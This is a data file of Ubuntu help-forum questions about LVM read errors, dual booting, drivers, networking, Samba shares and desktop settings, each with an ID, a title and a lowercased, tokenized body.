470563	getting `` read failed after 0 of 4096 at xxxxxx : input/output error '' error for lvm	i have system with ubuntu 12.04 . on this system used lvm for managing disk drives and similar mass-storage devices . when i used lvscan command for scanning all the logical volumes then it displayed following output ( 12.10_20140228_00 ) ubuntu @ pdc-00000 : ~ $ sudo lvscan [ sudo ] password for ubuntu : /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 10737352704 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 10737410048 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 0 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 4096 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 10737352704 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 10737410048 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 0 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 4096 : input/output error active '/dev/ubuntu/videos ' [ 30.00 gib ] inherit active '/dev/ubuntu/swap ' [ 5.59 gib ] inherit active original '/dev/ubuntu/rootfs_12.10_base ' [ 10.00 gib ] inherit active '/dev/ubuntu/logging ' [ 12.00 gib ] inherit active '/dev/ubuntu/bluetooth ' [ 12.00 mib ] inherit active '/dev/ubuntu/machine_config ' [ 12.00 mib ] inherit active snapshot '/dev/ubuntu/rootfs_12.10_20140228_00 ' [ 6.00 gib ] inherit inactive snapshot '/dev/ubuntu/rootfs_12.10_20140228_01 ' [ 6.00 gib ] inherit inactive snapshot '/dev/ubuntu/rootfs_12.10_20140409_00 ' [ 6.00 gib ] inherit active snapshot '/dev/ubuntu/rootfs_12.10_20140409_01 ' [ 6.00 gib ] inherit also here is the output of pvscan ( 12.10_20140228_00 ) ubuntu @ pdc-00000 : ~ $ sudo pvscan [ sudo ] password for ubuntu : /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 10737352704 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 10737410048 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 0 : input/output error /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 4096 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 10737352704 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 10737410048 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 0 : input/output error /dev/ubuntu/rootfs_12.10_20140409_00 : read failed after 0 of 4096 at 4096 : input/output error pv /dev/sda2 vg ubuntu lvm2 [ 101.79 gib / 20.18 gib free ] total : 1 [ 101.79 gib ] / in use : 1 [ 101.79 gib ] / in no vg : 0 [ 0 ] what is meaning of /dev/ubuntu/rootfs_12.10_20140228_01 : read failed after 0 of 4096 at 10737352704 : input/output error . please let me know why this error is getting and is it affect on the system ?
470565	help booting windows 8 ( and possibly other problems )	here are my files ... 1.0 tb hard disk cd/dvd drive ( nodus probably ) 7.9 gb drive ( i will explain its importance ) other devices 967 mb loop device =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= i installed ubuntu 14.04 as a dual boot . everything works properly but whenever i shut down my computer and turn it back on ( hoping to get to the which os screen ) i have to have the usb in otherwise it says `` ca n't boot hard-drive ( something 3 something ) '' along the lines of that . when i do have the usb in however , i get to the grub installation menu ... also i forgot to make it so windows shuts down all the way . it is still on that `` snapshot '' thing .
470566	can not distribute objects in libreoffice impress	i read a lot online that it should be possible to distribute objects in libreoffice impress vertically or horizontally . it should be wether from the modify menu or from the right click menu . however , i do n't have that option when right-clicking my selected three objects . can anyone help ? thanks phil
470572	how do i save the name of installed packages on my system in order to restore this state elsewhere ?	i have 12.04 and i 'm looking for a way to store all the currently installed packages names into a file or archive . not the packages themselves , but the names . or the package management 's state . i 'd like to do this in order for the ability to synchronize the installed packages on demand on two computers . the idea would be to save the installed names on computer a , go to computer b , make a diff of the names and uninstall extra packages from b and install the missing ones . for this it would be good if the version could also be saved for each package . also i 'm not sticking to the names if there is something that better suits my scenario , something that the package management can work with as automatic as it can be . out of preference , i 'd like to do it without the use of a sync-server . looking for file-based solutions .
470573	thumbnails in nautilus visible only on click	on my 64 bit ubuntu 14.04 , nautilus shows me the thumbnails of .png files only when i select ( single click ) on the file . otherwise it is just blank . a post suggested to remove all the generated thumbnails using : sudo rm -rf ~/.cache/thumbnails/* the behaviour was the same after deleting . i can see that the thumbnails are being generated in ~/.cache/thumbnails/large whenever i open my png folder in nautilus . so why is nautilus not showing the thmbnails ? the owner and group of the cache folder is faizal : faizal . the permissions are drwx -- -- -- . edit : the behaviour seems inconsistent now after a couple of days ( and restarts ) . the thumbnails mostly show now , but at times it is blank .
470574	map `` home '' , `` end '' , `` pgup '' `` pgdown '' on hp mini	i have an hp mini 110 , which comes without any home , end , page up or page down keys . according to an official support page , those keys should be mapped to fn+arrow , but that does n't work on my machine . the same thread ( and a similar one ) suggested updating the bios , and then provide a link to an exe file . so my questions are actually twofold : how can i map those keys on hp mini on ubuntu ( i 've actually tried other linux oss and the result is the same ) ? can i update my computer bios using the files provided on those forums ? how ?
470575	how to find out what versions of maas maas-dns and maas-dhcp from terminal	i would like to know how do you find out what version of maas is running on my ubuntu 14.4 installation what command is used to find maas api version , maas-dns , maas dhcp . please be specific . thanks
470576	photoshop in ubuntu - what are my options ?	i tried installing wine and running cs6 under that but i kept getting the pointer bug where it registers click but does n't register the stroke . i am looking into the virtualbox + windows options but ca n't find my xp cd that i bought years ago . is there a trimmed down version of windows i could use or something like that ? i 'd like to stay away from pirate bay and downloading illegal copies of windows . thanks !
470582	install kde on ubuntu 12.04	i 've got trouble installing the kde desktop on my ubuntu . i installed the package kde-standard from the ubuntu software center and rebooted the computer . the login screen is now different and more kde like , but the desktop stayed the same . it 's still the normal ubuntu desktop . do i need to install any other packages besides kde-standard ?
470583	share folder path in ubuntu	i am new admin in ubuntu i am from windows background . i have confusion like we share a folder in windows from any drive so how to give a path name to folder in samba server
470590	no sound on classic headphone but mic works ubuntu 14.04 64bit	i am using a dell vostro 1014 running with ubuntu 14.04 64 bit . internal speaker front left alone is working . when i plug classic headset no sound but microphone in the headset is working . below is the aplay -l output aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : conexant analog [ conexant analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 alsamixer does not detect headphone ubuntu sound setting shows analog output and input ( built in audio ) kindly suggest how to troubleshoot . thank you , sajith
470592	disable chrome 's new notification icon	yesterday i noticed a google notification indicator when google chrome updated to version 35.0.1916.114 . how can i remove it and stop google from changing my desktop like that ?
470593	how to improve boot time and solve overheating issues ?	okay guys , i am new to ubuntu and linux . truth be told , my first time feels like hell . i have been having problems booting up ( takes a lot of time ) . my laptop is overheating and i can smell things . i have been reading other posts and these are my findings optimus technology- in order to cut power to the gpu you 'll either need proprietary drivers from nvidia or open-source bumblebee drivers . i have n't yet tried out the open-source bumblebee drivers but did try the proprietary nvidia drivers which ironically made my laptop hotter that the default nouveau from x server ... coming to the other issue of boot time ( this thing is making me crazy ) i read other posts and they have told to open boot log and see which task is stalling and i have used dmesg and obtained the following log which i could hardly interpret please help me interpret this thing and solve my boot up time problem . i am using lenovo z580 processor : intel® core™ i5-3210m cpu @ 2.50ghz × 4 , memory : 4 gb , hdd : 500 gb , gpu : nvidia gt 630m , graphic memory:1 gb [ 21.816489 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) [ 21.816609 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) [ 23.795493 ] audit_printk_skb : 33 callbacks suppressed [ 23.795496 ] type=1400 audit ( 1400739442.240:23 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/sbin/cups-browsed '' pid=827 comm= '' apparmor_parser '' [ 24.498537 ] r8169 0000:03:00.0 eth0 : link down [ 24.498585 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 24.498953 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 25.798718 ] type=1400 audit ( 1400739444.240:24 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=930 comm= '' apparmor_parser '' [ 25.798724 ] type=1400 audit ( 1400739444.240:25 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=930 comm= '' apparmor_parser '' [ 25.798727 ] type=1400 audit ( 1400739444.240:26 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=930 comm= '' apparmor_parser '' [ 25.799101 ] type=1400 audit ( 1400739444.240:27 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=930 comm= '' apparmor_parser '' [ 25.799105 ] type=1400 audit ( 1400739444.240:28 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=930 comm= '' apparmor_parser '' [ 25.799274 ] type=1400 audit ( 1400739444.240:29 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=930 comm= '' apparmor_parser '' [ 25.801411 ] type=1400 audit ( 1400739444.244:30 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cups-browsed '' pid=934 comm= '' apparmor_parser '' [ 25.804552 ] type=1400 audit ( 1400739444.244:31 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=935 comm= '' apparmor_parser '' [ 25.804557 ] type=1400 audit ( 1400739444.244:32 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=935 comm= '' apparmor_parser '' [ 31.414429 ] init : plymouth-upstart-bridge main process ended , respawning [ 31.449913 ] init : plymouth-upstart-bridge main process ended , respawning [ 36.825656 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) [ 36.825745 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20131115/nsarguments-95 ) [ 169.279129 ] systemd-hostnamed [ 2453 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname !
470594	how do i get java plugin working on google chrome ?	google has updated its chrome browser to version 35 . this new version uses aura in place of gtk2 and no longer supports npapi plugins like java ( both openjdk and oracle ) . ppapi plugins like pepperflash still work . my school uses google chrome and google apps every day and this looks like a potentially big problem for some of the educational websites we use . has anyone run into a solution or workaround to get java working ? this web upd8 article confirms that java does not work .
470599	how to downgrade from ubuntu 13.10 back to 13.04	i recently installed ubuntu 13.04 on my acer c7 chromebook and i upgraded to 13.10 , after the upgrade i did n't like 13.10 because it was too buggy . i really prefer 13.04 . is there anyway which i can revert back to 13.04 easily ?
470603	webcam does n't work in xubuntu 14.04	i have problems with my webcam . in xubuntu 13.04 it 's works perfectly , but when i upgraded to version 14.04 webcam does n't work .
470604	unable to handle kernel null pointer dereference	i am trying to connect to a ccd camera that communicates through a pci card . when the pci card is sitting directly in the pc there is no problems , but when the pci card is connected to the pc through a fiber extender , i get the following error : [ 1402.460924 ] bug : unable to handle kernel null pointer dereference at 0000000000000038 [ 1402.460981 ] ip : [ < ffffffffa04f76f1 > ] andordisableinterrupts+0x21/0x40 [ andordrvlx ] [ 1402.461030 ] pgd 3e7eec067 pud 3ea331067 pmd 0 [ 1402.461063 ] oops : 0000 [ # 1 ] smp [ 1402.461089 ] cpu 0 [ 1402.461101 ] modules linked in : andordrvlx ( o ) ip6table_filter ip6_tables iptable_filter ip_tables x_tables rfcomm bnep bluetooth parport_pc ppdev nfsd nfs lockd fscache auth_rpcgss binfmt_misc nfs_acl sunrpc snd_hda_codec_hdmi snd_hda_codec_realtek tpm_infineon shpchp coretemp snd_hda_intel kvm ghash_clmulni_intel aesni_intel cryptd aes_x86_64 snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device lpc_ich hp_wmi sparse_keymap snd soundcore snd_page_alloc microcode tpm_tis psmouse serio_raw wmi i915 drm_kms_helper mac_hid drm mei i2c_algo_bit video lp parport hid_generic usbhid hid ahci libahci e1000e [ 1402.461564 ] [ 1402.461570 ] pid : 2295 , comm : image tainted : g w o 3.5.0-44-generic # 67~precise1-ubuntu hewlett-packard hp compaq elite 8300 cmt/3396 [ 1402.461642 ] rip : 0010 : [ < ffffffffa04f76f1 > ] [ < ffffffffa04f76f1 > ] andordisableinterrupts+0x21/0x40 [ andordrvlx ] [ 1402.461699 ] rsp : 0018 : ffff8803e7de1e98 eflags : 00010282 [ 1402.461729 ] rax : 0000000000000000 rbx : 0000000000000000 rcx : ffffffffa04fc428 [ 1402.461767 ] rdx : ffffffffa04fc3c8 rsi : ffffffffa04fc428 rdi : 0000000000000000 [ 1402.461805 ] rbp : ffff8803e7de1e98 r08 : 0000000000000000 r09 : 0000000000000000 [ 1402.461843 ] r10 : ffff8803e7e99510 r11 : 0000000000000246 r12 : 0000000000000000 [ 1402.461881 ] r13 : ffff8803e55923c0 r14 : ffff88040285d2c8 r15 : ffff88040285d2c8 [ 1402.461920 ] fs : 00007fe7d9899740 ( 0000 ) gs : ffff88041ea00000 ( 0000 ) knlgs:0000000000000000 [ 1402.461963 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 [ 1402.461994 ] cr2 : 0000000000000038 cr3 : 00000003e7d1b000 cr4 : 00000000001407f0 [ 1402.462032 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 [ 1402.462070 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 [ 1402.462109 ] process image ( pid : 2295 , threadinfo ffff8803e7de0000 , task ffff8804041b1700 ) [ 1402.462152 ] stack : [ 1402.462165 ] ffff8803e7de1eb8 ffffffffa04f8ac4 ffff8803e7e99500 0000000000000008 [ 1402.462213 ] ffff8803e7de1f08 ffffffff81189e7e ffff8803e7e99510 ffff880404270160 [ 1402.462261 ] 000000000000a002 ffff8803e7e99500 ffff8803eecc3440 0000000000000000 [ 1402.462309 ] call trace : [ 1402.462329 ] [ < ffffffffa04f8ac4 > ] andor_release+0x54/0x90 [ andordrvlx ] [ 1402.462370 ] [ < ffffffff81189e7e > ] __fput+0xbe/0x240 [ 1402.462400 ] [ < ffffffff8118a025 > ] fput+0x25/0x30 [ 1402.462428 ] [ < ffffffff81186ca6 > ] filp_close+0x66/0x90 [ 1402.462458 ] [ < ffffffff81186d6e > ] sys_close+0x9e/0x110 [ 1402.462491 ] [ < ffffffff816a7729 > ] system_call_fastpath+0x16/0x1b [ 1402.462524 ] code : c3 66 0f 1f 84 00 00 00 00 00 55 48 89 e5 0f 1f 44 00 00 48 63 d7 48 69 d2 90 03 00 00 48 8b 82 c8 c3 4f a0 48 81 c2 c8 c3 4f a0 < 8b > 40 38 48 8b 12 25 ff ef 00 ff 89 42 38 e8 ec fe ff ff 31 c0 [ 1402.462785 ] rip [ < ffffffffa04f76f1 > ] andordisableinterrupts+0x21/0x40 [ andordrvlx ] [ 1402.462831 ] rsp < ffff8803e7de1e98 > [ 1402.462851 ] cr2 : 0000000000000038 [ 1402.556994 ] -- - [ end trace 50d359ca26ea68e0 ] -- - does anyone have any idea as to what can be the problem ?
470607	unable to configure virtualhosts in ubuntu+apache+webmin	i am not able to create any virtual srevers in fresh webmin + apache installation . getting the below errors when i try to add a domain : failed to create virtual server : the new virtual server was added to /etc/apache2/sites-available/****.com.conf , but this file is not used by apache . check the module configuration and make sure the 'file or directory to add virtual servers to ' is correct . following are enabled in apache2.conf : includeoptional conf-enabled/.conf includeoptional sites-enabled/.conf i have tried to install the apache from webmin but the issue persists . i have attached the errors and current configurations . please check and assist . http : //postimg.org/image/6jobea1z1/ http : //postimg.org/image/4vp5zmo3h/
470609	rtl8101e/rtl8102e not working with ubuntu 14.04 . hp g61	after searching questions , forums , guides , i could find any solutions that would fit the average joe ... being ubuntu , linux for humans , i 'll ask the question once again , trying to adjust the best answer so that anyone could use it . i plug a ethernet cable on eth0 and it does n't appear on the network manager as a connection . i use ubuntu 14.04 lspci -nn 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) ifconfig eth0 eth0 link encap : ethernet endereço de hw 00:00:00:00:00:00 broadcast multicast mtu:1500 métrica:1 pacotes rx:0 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:0 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i 'm a newbie , so help me , helping you helping me . = ) how can i debug this furthermore ?
470611	`` this kernel requires a x86-64 cpu but only detected an i686cpu . '' when installing ubuntu on virtualbox	while trying to install ubuntu 14.04 i have this message : this kernel requires a x86-64 cpu but only detected an i686cpu . unable to boot use a kernel appropriate for your cpu . what should i do ?
470613	how to avoid `` framebuffer '' error in ubuntu touch emulator ?	when i boot into ubuntu touch , it gives me the following error and hangs : '' framebuffer : :post eglmakecurrent failed '' it only happens when i 'm using my propreitary display driver . so i understand this is likely to be a driver related issue which is beyond the control of canonical . hence i 'm seeking a workaround to avoid this . ( maybe by disabling gpu rendering in the emulator ? ) this situation is very uncomfortable when it comes to app development . ubuntu touch version : trusty thar host os : trusty thar ubuntu-emulator version : 0.2+14.10.20140429.1-0ubuntu1 my gpu : amd mobility radeon hd 5430 thanks for any help !
470620	skype video blinking - why	i have an old ibm thinkcentre runing lubuntu 14.04 and it works fine and quick . i 'm using skype but when both video screens are on - the local and the remote camera - they are `` blinking '' at about 30-50 hz - if one of them - the local or the remote camera - is off then the remaining is showing normal . how do i solve this problem ?
470623	no network access when connecting to wi-fi range extender , when connected to router it 's ok	today i bought a d-link dap-1320 wi-fi range extender to boost my signal , but when i try to connect to the wireless ( g/n-standard ) via the extender , the connection is established , but its like there is no network ( ca n't even ping the extender ) . when i connect directly to the router ( again g/n standard ) , the router is a d-link dir-615 , everything is ok. at the same time when i use windows everything works very good . here is some data about the laptop : uname -a linux nikola-lenovo-g780 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 x86_64 x86_64 gnu/linux sudo lspci -vvnn 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at d3800000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0+ , d1- , d2- , d3hot+ , d3cold+ ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=2 pme- capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ d0 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 4us , l1 unlimited exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l1 , exit latency l0s < 4us , l1 < 64us clockpm+ surprise- llactrep+ bwnot- lnkctl : aspm l1 enabled ; rcb 64 bytes disabled- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive+ bwmgmt- abwmgmt- capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- capabilities : [ 13c v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 00-00-e2-ff-ff-f1-f4-b7 capabilities : [ 16c v1 ] power budgeting < ? > kernel driver in use : wl lshw -c network *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 20:89:84:8e : b0 : d5 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : d3900000-d393ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : f4 : b7 : e2 : f1:7d : df width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.0.104 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : d3800000-d3803fff nikola @ nikola-lenovo-g780 : ~ $ lspci -vvnn | grep 14e4 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ]
470629	libreoffice version	now , i use libreoffice writer 3.5.7.2 . according to http : //ask.libreoffice.org/en/question/34088/selecting-copying-pasting-text/ and further things i need libreoffice writer 4.0 or higher . when it may be in the ubuntu software center for my ubuntu 12.04 ? if it is there , is it offered by my upgrade manager without my request ? thanks .
470632	install lvm dual boot with windows	i am trying to install ubuntu dual boot with windows . i have about 150g free space in may machine and want to install ubuntu 14.04 there . my machine has this partition structure partition 1 primary windows system reserved partition 2 primary partition 3 primary extended extended partition 4 logical < free space > i boot up using a usb startup disk and it detects windows 7 and asks if i want to install ubuntu alongside it , however if i select this option , use lvm option is disabled . is there a way to install ubuntu with lvm in this setup ? thanks
470633	unable to use/detect a bluetooth dongle on 12.04	i 'm running ubuntu 12.04 and for some unknown reason i 'm unable to use a 4th generation bluetooth adapter . here is the result of lsusb command ( you can clearly see the belkin usb dongle laurent06000 @ pc-de-ldp : ~ $ lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 1058:10b8 western digital technologies , inc . bus 001 device 004 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 001 device 006 : id 045e:00f5 microsoft corp. lifecam vx-3000 bus 001 device 011 : id 050d:065a belkin components bus 002 device 003 : id 1058:1048 western digital technologies , inc . bus 002 device 004 : id 1058:0820 western digital technologies , inc . bus 002 device 005 : id 0e8d:1806 mediatek inc . bus 002 device 006 : id 152d:2338 jmicron technology corp. / jmicron usa technology corp. jm20337 hi-speed usb to sata & pata combo bridge bus 002 device 007 : id 058f:6362 alcor micro corp . flash card reader/writer
470634	how to add persian/farsi keyboard input method in lubuntu 14.04 ?	in lubuntu 14.04 i went to `` preferences > keyboard input methods > select an input method > show all input methods '' but there is no persian ( or farsi ) to select .
470635	scp to nas permission denied	there are several ways to go , and i wish to find out about them . i have a file on our ad server . i have root access for the server , and wish to copy over a file to our ad nas . the file is owned by a different user on the ad server with -rw-r -- r -- . i have no problem to scp the file to my own node 's /home/user . i assume there are different ways to copy to the nas . i tried with mounting the nas both to my /mnt and /media folder . i ran scp centosminpuppet64-64.box user @ ip : /media/iso and ended up with permission denied . this was a try to copy it to my agent with the nas mounted as : sudo mount -t cifs -o credentials=/home/nicox/.smb //10.101.0.2/groups/ /media/iso/ when nas is mounted agents , /media/iso are , permissions of the nas are : drwxr-xr-x 0 root root is there a way to workaround this , by changing permissions and ownerships ? i have an own user and password for our samba nas itself . all our nodes are on the 10.101.x.x network . this is how the nas is set : 10.101.0.2/groups 10.101.0.2/users/my_user
470641	how to copy the recovered data from photorec to an external hd	i am on ubuntu 14.04 lts and while installing ubuntu i wiped my whole harddrive.by looking at threads on this forum and asking questions i was able to install testdisk and recover one of my partition fully.but one of my other drive showed bad partition structure and was not able to recover.however on photorec i was able to see all those files.my question is how do i copy the files to my external harddrive from the photorec ? mine system hd is 500gb and it says not enough space . thanks .
470643	can ubuntu work on a pentium t4400 cpu ?	i have a dell inspiron insp1440 laptop with a pentium t4400 dual-core cpu . i need to know if ubuntu 14.04 ( or any version ) will work on it before i burn ubuntu to a disk .
470647	super+digit takes precedence over ctrl+super+digit	i use ctrl+super+0-9 to switch workspace . i also use super+0-9 to start programs that are pinned to the bar ( unity default ) . the problem is that when i try to switch workspace , if i happen to press super before ctrl , super+0-9 is executed as if ctrl was never pressed although it is . how do i make sure that ctrl+super+0-9 is recognized as such , whatever the order in which ctrl and super were pressed ?
470649	max memory and storage capacity of ubuntu 14.04 lts	does anybody know what is the maximum memory ( ram ) capacity and hdd ( storage ) capacity for both 32-bit version and 64-bit version of 14.04 lts ? same ubuntu 13.10 32 & 64 bit versions too .
470652	how can i paste copied-clipboard text to a file from terminal ?	i have copied something from internet and i want that copied text to get copied to a file . but how can i copy that text without using mouse or any command like ctrl+v . i want to do this from terminal . how can i do that in ubuntu 12.04 ?
470653	log in through windows network and mount home via samba	i 'm a teacher in high school and i would like my pupils use linux instead of the old and broken windows . here is the description of the current network : the pupils log on windows session through a windows network . once logged , they can store their contents in a folder on a drive named h : . for example , the folder of the pupils foo in the class bar is h : \\class_bar\foo\ . the pupils can also read the folder h : \\calss_bar\_work , which is filled by the teachers . the teachers has rw access on all h : . i do n't think i could modify the server ( `` what ! ! you want install linux ! ? ? but it 's too complicated for our pupils ! ! windows is quite enough ! '' ... ) . hopefully , i can discreetly install what i want on the computers in my class room : d. i would like that the log on the computer under linux simulate a log on a computer under windows . i mean : the pupils and the teachers log with the same id 's than in the windows case , h : \\class_bar\foo\ is mount on /home/foo ( or at least on /home/foo/network/ , i 've read that could be difficult ) . what is the simplest way to achieve these goals ( there is not a lot of computers in my class room , i can manually repeat the install operations for all of them ) ? i 'm not very familiar with network and user login process , what documentation/tutorials would you advise me to read ?
470654	unable to get second monitor to work	i 'm very new to ubuntu to please take that into consideration with your replies . we have some old laptops that we are trying to use to just display a website on our tv in our office . i have installed the most recent version of ubuntu 14.04 on a hp nx7400 . this laptop has a integrated video card ( intel 945gm ) . i have gone to the following intel website ( https : //01.org/linuxgraphics/downloads ) and downloaded graphics installer 1.0.5 for ubuntu* 14.04 , 64-bit . i walked through the directions and from what i can tell it installed on ubuntu . but unfortunately this did not fix my issue as when i hook the tv to the laptop ubuntu will see that i plugged in the tv , but it will not output anything to that tv screen . the tv screen will flash a message of invalid format . the only resolution i have is 1024x764 ( 4:3 ) . and the current windows xp laptop that we have setup and working on the tv is using 1820x720 . again i 'm really new to this os so i 'm stuck at how to tell if the drive for the video card is installed or not . any help that you can give me would be much appreciated .
